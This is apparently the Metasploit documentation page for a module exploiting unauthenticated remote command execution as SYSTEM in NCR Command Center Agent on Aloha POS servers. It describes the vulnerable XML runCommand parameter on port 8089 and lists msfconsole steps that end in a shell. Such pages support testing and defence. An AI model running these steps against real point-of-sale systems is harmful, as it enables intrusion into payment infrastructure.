Path: blob/master/documentation/modules/exploit/windows/misc/ncr_cmcagent_rce.md
25416 views
Vulnerable Application
CMCAgent in NCR Command Center Agent 16.3 on Aloha POS/BOH servers permits the submission of a runCommand parameter (within an XML document sent to port 8089) that enables the remote, unauthenticated execution of an arbitrary command as SYSTEM, as exploited in the wild in 2020 and/or 2021. NOTE: the vendor's position is that exploitation occurs only on devices with a certain "misconfiguration."
Successfully tested against NCR Command Center Agent 16.2.1.1
Install
The original link is https://rdf2.alohaenterprise.com/client/CMCInst.zip. Since the URL was inaccessible, the file was downloaded using the Web Archive. Here’s the final URL:
Verification Steps
Install the application
Start msfconsole
Do:
use windows/misc/ncr_cmcagent_rceDo:
set rhosts [ip]Do:
set lhost [ip]Do:
runYou should get a shell.